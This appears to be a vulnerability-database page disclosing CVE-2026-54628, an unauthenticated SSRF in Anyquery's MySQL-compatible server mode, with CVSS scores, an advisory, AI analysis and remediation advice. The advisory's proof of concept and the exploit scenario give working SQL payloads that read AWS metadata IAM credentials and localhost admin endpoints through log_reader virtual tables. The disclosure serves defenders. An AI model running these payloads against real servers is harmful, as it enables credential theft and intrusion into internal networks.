Skip to main content

Anyquery CVE-2026-54628

HIGH
Improper Access Control (CWE-284)
2026-07-14 https://github.com/julien040/anyquery GHSA-hwrq-8wxh-q4xv
8.6
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.6 HIGH
AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
vuln.today AI
9.3 CRITICAL

Unauthenticated network-reachable listener (PR:N, AV:N, AC:L); SSRF pivots to other systems (S:C) with High confidentiality from credential/data theft and Low integrity via state-changing internal API calls.

3.1 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 14, 2026 - 20:52 vuln.today
Analysis Generated
Jul 14, 2026 - 20:52 vuln.today
CVE Published
Jul 14, 2026 - 20:02 github-advisory
HIGH 8.6

DescriptionGitHub Advisory

Summary

Anyquery's server mode does not restrict outbound HTTP requests initiated by its built-in SQLite virtual table modules (e.g., json_reader, log_reader). Unauthenticated attackers connecting to the MySQL-compatible server port can create virtual tables pointing to internal network endpoints or Cloud Metadata IPs (e.g., http://169.254.169.254/latest/meta-data/). This allows attackers to perform Server-Side Request Forgery (SSRF), bypassing external firewalls to scan internal ports and exfiltrate cloud credentials.

Details

When Anyquery is launched in Server Mode (anyquery server), it binds to a TCP port and accepts MySQL protocol connections. The server handler allows the creation of dynamic virtual tables using modules like json_reader or log_reader, which internally use go-getter to fetch URLs. There is no protection mechanism to prevent fetches to local (127.0.0.0/8), private (10.0.0.0/8), or special (169.254.169.254) IP addresses.

An attacker can use this to map internal networks, interact with internal APIs, or steal IAM tokens from cloud metadata servers by fetching the data and reading it as a database table.

PoC (Proof of Concept)

  1. Start the server on the victim machine (e.g., an AWS EC2 instance):
bash
   anyquery server --host 0.0.0.0 --port 8070
  1. Connect from an attacker machine:
bash
   mysql -u root -h <VICTIM_IP> -P 8070
  1. Execute the payload to fetch AWS Metadata or hit a local API:
sql
   -- Payload 1: Fetch AWS Cloud Metadata (IAM credentials)
   CREATE VIRTUAL TABLE aws_meta USING log_reader('http://169.254.169.254/latest/meta-data/');
   SELECT * FROM aws_meta;

   -- Payload 2: Access an internal application bound only to localhost
   CREATE VIRTUAL TABLE local_admin USING log_reader('http://localhost:8000/admin');
   SELECT * FROM local_admin LIMIT 10;

Impact

  • Confidentiality: High. Exfiltration of sensitive internal network data or cloud credentials.
  • Integrity: Low. Possible interaction with state-changing internal REST APIs.
  • Availability: None.
  • CVSS Score: 8.6 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

Remediation

By default, in Server Mode, remote HTTP fetches to local/private IP ranges and known Cloud Metadata IP addresses should be blocked unless explicitly enabled via configuration.

AnalysisAI

Server-Side Request Forgery in Anyquery's server mode (versions < 0.4.5) lets remote attackers who reach the MySQL-compatible listener force the server to fetch arbitrary URLs through its built-in SQLite virtual table modules (json_reader, log_reader), which internally use go-getter. Because the server accepts MySQL connections without authentication and applies no allow/deny list on fetch targets, an attacker can CREATE VIRTUAL TABLE against internal endpoints or the cloud metadata IP (169.254.169.254) and read the response as a table, bypassing external firewalls to scan internal services and exfiltrate cloud IAM credentials. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Reach exposed MySQL server port
Delivery
Connect unauthenticated via MySQL client
Exploit
CREATE VIRTUAL TABLE with log_reader URL
Execution
Server fetches 169.254.169.254 or internal endpoint
Persist
SELECT returns fetched data
Impact
Exfiltrate IAM credentials or map internal services

Vulnerability AssessmentAI

Exploitation The attacker must be able to reach the Anyquery server-mode MySQL listener (started via 'anyquery server', e.g. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The provided CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N, base 8.6) describes a network-reachable, low-complexity, unauthenticated attack with a scope change reflecting the pivot from the Anyquery process into other systems (internal APIs, cloud metadata) - a coherent and credible profile for classic SSRF-to-metadata. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An operator runs 'anyquery server --host 0.0.0.0 --port 8070' on an AWS EC2 instance to allow remote querying. An attacker who can reach that port connects with an unauthenticated MySQL client, issues CREATE VIRTUAL TABLE aws_meta USING log_reader('http://169.254.169.254/latest/meta-data/iam/security-credentials/'), and SELECTs the resulting table to read temporary IAM credentials, then reuses the same technique against http://localhost:8000/admin and internal ranges to pivot. …
Remediation Vendor-released patch: 0.4.5 - upgrade Anyquery to 0.4.5 or later, which the release notes describe as adding server sandboxing for the security advisories including GHSA-hwrq-8wxh-q4xv (https://github.com/julien040/anyquery/releases/tag/0.4.5). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, inventory all Anyquery deployments identifying instances running in server mode (versions < 0.4.5), immediately restrict MySQL listener access to trusted hosts only via firewall rules, and block all outbound connections to 169.254.169.254 (cloud metadata service). …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-54628 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy